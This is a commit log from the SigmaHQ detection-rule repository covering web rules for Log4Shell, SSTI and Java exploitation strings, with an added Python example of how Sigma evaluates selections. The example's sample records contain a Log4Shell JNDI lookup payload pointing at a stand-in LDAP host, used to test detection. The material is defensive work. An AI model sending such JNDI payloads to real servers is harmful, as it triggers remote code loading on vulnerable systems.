Nasreddine Bencherchali
a2d19f3db2
Add FP filter + FP remark
2022-06-15 11:48:15 +01:00
Nasreddine Bencherchali
9f0989e49c
Quick typo fix
2022-06-15 11:38:34 +01:00
Nasreddine Bencherchali
894f6af09f
Removed double quotes
2022-06-15 11:30:01 +01:00
Nasreddine Bencherchali
ee23e653f9
Added "GET" method selection
2022-06-15 11:29:31 +01:00
Nasreddine Bencherchali
e42318b0fb
Update web_ssti_in_access_logs.yml
2022-06-14 22:10:09 +01:00
Nasreddine Bencherchali
b54df8d9ce
Rename+Update
2022-06-14 21:58:34 +01:00
Nasreddine Bencherchali
f527b8eb4c
Rename Web CVE Rules
...
Renamed WEB CVE rules to the format "web_cve_20XX_XXXX_rest_of_name"
2022-06-14 19:22:26 +01:00
Nasreddine Bencherchali
00db705ae6
Rename Web Rule
2022-06-14 19:13:15 +01:00
Florian Roth
d3d5f4faea
Update web_susp_windows_path_uri.yml
2022-06-07 10:45:06 +02:00
Nasreddine Bencherchali
7327dd53e5
New/Update Rules
...
- Renamed "sql_injection_keywords.yml" to "web_sql_injection_keywords.yml" to conform with the rest of the rules in the WEB directory
- Renamed "xss_keywords.yml" to "web_xss_keywords.yml" to conform with the rest of the rules in the WEB directory
- Renamed "proc_create_win_msdt_susp_parent.yml" to "proc_creation_win_msdt_susp_parent.yml" to conform with other process creation rules
- Renamed "proc_create_win_sdiagnhost_susp_child.yml" to "proc_creation_win_sdiagnhost_susp_child.yml" to conform with other process creation rules
- Moved the rule "win_powershell_snapins_hafnium.yml" to process_creation folder instead of the WEB folder
- Created "web_susp_windows_path_uri.yml" to detect URIs that contain susp windows paths
- Updated the description of "web_webshell_keyword.yml" and added 3 more cases
- Created "file_event_win_cve_2021_44077_poc_default_files.yml" to detect the default dropped file from the POC of CVE-2021-44077 (Showcased in the DFIR report)
- Created "proc_creation_win_renamed_plink.yml" to detect renamed usage of "Plink"
2022-06-06 21:16:52 +01:00
Florian Roth
3b4ad16c5f
refactor: new expr from honeypot, increased level
2022-06-06 17:32:08 +02:00
frack113
b3d9706014
Update web_java_in_access_log.yml
2022-06-04 15:21:04 +02:00
frack113
f4c61c58f6
Update web_java_in_access_log.yml
2022-06-04 13:39:36 +02:00
frack113
6af060a91f
Add new string
2022-06-04 10:08:49 +02:00
frack113
e886b08755
add web_java_in_access_log
2022-06-04 08:46:14 +02:00
Nasreddine Bencherchali
97856b562a
Add "\" to "Image|endswith" modifier
...
- Added the "\\" (backslash) to the "(Parent)Image|endswith" modifiers to avoid possible confusion.
- The modifications were mostly done on default windows binaries to avoid changing the logic of other rules.
2022-06-02 13:39:07 +01:00
David ANDRE
74b9f97b9c
Renamed suspicious in filenames to susp
2022-05-19 09:37:04 +02:00
phantinuss
112b715dd6
chore: test rules: reactivate single value list check
2022-05-10 17:13:04 +02:00
phantinuss
dbd68bf3f0
chore: test rules: capitalization on FP list entries
...
Entries in the false positive list should begin with
a capital letter, e.g. Unknown instead of unknown.
Fixed the existing rules accordingly
2022-05-09 16:07:44 +02:00
Florian Roth
e91fc4486e
refactor: first bigger log source refactoring
...
see discussion here: https://github.com/SigmaHQ/sigma/discussions/2835
2022-03-22 17:58:29 +01:00
phantinuss
84d0c472ba
fix: remove penetration test as valid false positive reason
2022-03-16 14:33:18 +01:00
phantinuss
8d3f8acb60
fix: none --> Unknown
2022-03-16 14:19:21 +01:00
phantinuss
4585133325
fix: remove penetration testing as a valid false positive
2022-03-16 13:51:26 +01:00
phantinuss
b23eee6ebf
fix: unknown --> Unknown
2022-03-16 13:43:54 +01:00
Florian Roth
35d4c8bc69
fix: FPs noticed in THOR testing
2022-02-21 10:15:27 +01:00
Florian Roth
e2aa3665af
fix: avoid Microsoft Defender detections
...
We keep the strings as specific as necessary while avoiding Microsoft Defender detections on the rule files
2022-02-06 08:56:54 +01:00
frack113
4631d0c482
remove invalid tag
2022-01-19 18:23:30 +01:00
frack113
f7e670d55e
Simple Quote
2022-01-11 13:40:53 +01:00
Florian Roth
e055ec1d52
refactor: change all " of them" expressions
2022-01-11 10:59:57 +01:00
frack113
c6014b1205
Change status to test
2022-01-07 07:04:24 +01:00
frack113
73f258e2d1
Change double quote to quote
2022-01-06 14:02:35 +01:00
Fred Frey
44fecf8ebd
typo
2021-12-16 12:12:37 -05:00
Fred Frey
05245b5ac7
implemented @frack113 1 of selection* suggestion
2021-12-16 12:09:39 -05:00
Fred Frey
972dfbc4d2
Log4j OR each section vs implicit AND
...
When the original is compiled it requires one TRUE from each field (implicit AND) ... I believe the intent is to search all fields of any trace, hence the explicit OR in "condition"
2021-12-16 01:53:33 -05:00
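The point raised in the commit above is a Sigma semantics detail worth seeing executed: several `field|modifier: value` pairs inside one selection are ANDed together, while splitting them into `selection_*` blocks joined by `1 of selection*` ORs them. The following is an added, stand-alone illustration written for this page; it is not code from the SigmaHQ project, and the field names (`cs-uri-query`, `cs-user-agent`, `cs-referer`), the `${jndi:` needle and the log records are constructed for the example rather than taken from the actual `web_cve_2021_44228_log4j_fields.yml` rule.

```python
"""Sigma-style selection evaluation: implicit AND inside one selection
versus "1 of selection*" across several selections.

Added illustration for this commit log, not SigmaHQ project code. Field
names, the `${jndi:` needle and the sample records are constructed.
"""
import fnmatch
import re
from typing import Dict, List

# Hypothetical rule shaped like the original: one selection, three fields.
# Sigma ANDs the fields of a single selection, so all three must match.
SINGLE_SELECTION = {
    "selection": {
        "cs-uri-query|contains": "${jndi:",
        "cs-user-agent|contains": "${jndi:",
        "cs-referer|contains": "${jndi:",
    },
    "condition": "selection",
}

# Hypothetical rewrite: one selection per field, ORed by "1 of selection*".
PER_FIELD_SELECTIONS = {
    "selection_uri": {"cs-uri-query|contains": "${jndi:"},
    "selection_ua": {"cs-user-agent|contains": "${jndi:"},
    "selection_ref": {"cs-referer|contains": "${jndi:"},
    "condition": "1 of selection*",
}

# Constructed, already-parsed access-log records (not real traffic).
SAMPLE_RECORDS: List[Dict[str, str]] = [
    {  # payload only in the User-Agent header
        "cs-uri-query": "id=1",
        "cs-user-agent": "${jndi:ldap://198.51.100.7/a}",
        "cs-referer": "-",
    },
    {  # clean request
        "cs-uri-query": "id=2",
        "cs-user-agent": "Mozilla/5.0",
        "cs-referer": "https://example.test/",
    },
    {  # payload sprayed into every field
        "cs-uri-query": "q=${jndi:ldap://198.51.100.7/a}",
        "cs-user-agent": "${jndi:ldap://198.51.100.7/a}",
        "cs-referer": "${jndi:ldap://198.51.100.7/a}",
    },
]


def field_matches(record: Dict[str, str], key: str, needle: str) -> bool:
    """Evaluate one 'field|modifier: value' pair against a record."""
    field, _, modifier = key.partition("|")
    value = record.get(field, "")
    if modifier == "contains":
        return needle in value
    if modifier == "":
        return value == needle
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(record: Dict[str, str], selection: Dict[str, str]) -> bool:
    """All pairs of a selection must hold: Sigma's implicit AND."""
    return all(field_matches(record, k, v) for k, v in selection.items())


def rule_matches(record: Dict[str, str], rule: dict) -> bool:
    """Support a bare selection name or '1 of <glob>' (OR over matches)."""
    condition = rule["condition"]
    selections = {k: v for k, v in rule.items() if k != "condition"}
    m = re.fullmatch(r"1 of (\S+)", condition)
    if m:
        names = fnmatch.filter(list(selections), m.group(1))
        return any(selection_matches(record, selections[n]) for n in names)
    return selection_matches(record, selections[condition])


def scan(rule: dict, records: List[Dict[str, str]] = SAMPLE_RECORDS) -> List[int]:
    """Return the indexes of records the rule fires on."""
    return [i for i, rec in enumerate(records) if rule_matches(rec, rule)]


if __name__ == "__main__":
    print("implicit AND :", scan(SINGLE_SELECTION))      # only record 2
    print("1 of selection*:", scan(PER_FIELD_SELECTIONS))  # records 0 and 2
```

Record 0 carries the payload only in the User-Agent, which is exactly the case the ANDed form misses; the rule must OR the per-field selections to cover any single field being used as the injection vector.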
Florian Roth
baa5d3758d
Merge branch 'master' into rule-devel
2021-12-13 18:05:17 +01:00
Florian Roth
51a4315ab9
fix: referrer > referer adjustments
2021-12-13 15:47:43 +01:00
Florian Roth
fb167c5698
Merge pull request #2446 from izysec/patch-4
...
Added current known bypass patterns
2021-12-13 14:04:54 +01:00
Florian Roth
7b93291439
Merge pull request #2445 from izysec/patch-3
...
Added current known bypass patterns
2021-12-13 14:03:59 +01:00
Florian Roth
04ff26c786
Update web_cve_2021_44228_log4j_fields.yml
2021-12-13 11:47:55 +01:00
Florian Roth
ea3f1c6228
changed expression
...
the last part is already covered by the expression in line 38 but we can add the one that obfuscates the `jndi`
2021-12-13 11:47:12 +01:00
izysec
5819aa9888
Added current known bypass patterns
...
Source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
2021-12-13 15:51:25 +05:30
izysec
6c8b0c8fd8
Added current known bypass patterns
...
Source: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
2021-12-13 15:49:08 +05:30
Florian Roth
758334ac1c
Merge branch 'rule-devel' of https://github.com/SigmaHQ/sigma into rule-devel
2021-12-13 09:02:38 +01:00
Florian Roth
ef6fb35e2b
more patterns for log4shell
2021-12-13 09:02:24 +01:00
Florian Roth
d8613fedfe
more Log4Shell patterns
2021-12-12 21:27:01 +01:00
Florian Roth
31ddcd4a0d
Log4Shell - more patterns
2021-12-12 20:39:09 +01:00
Florian Roth
39217d4b44
rule: JNDIExploit
2021-12-12 13:16:05 +01:00
Florian Roth
63bb7673d6
Merge branch 'master' into rule-devel
2021-12-12 12:47:33 +01:00
Florian Roth
5da7537375
Merge pull request #2436 from izysec/patch-1
...
Additional IoC keywords added log4j detection
2021-12-12 12:46:36 +01:00
Florian Roth
23f59180d5
updated Log4Shell rules
2021-12-12 12:40:14 +01:00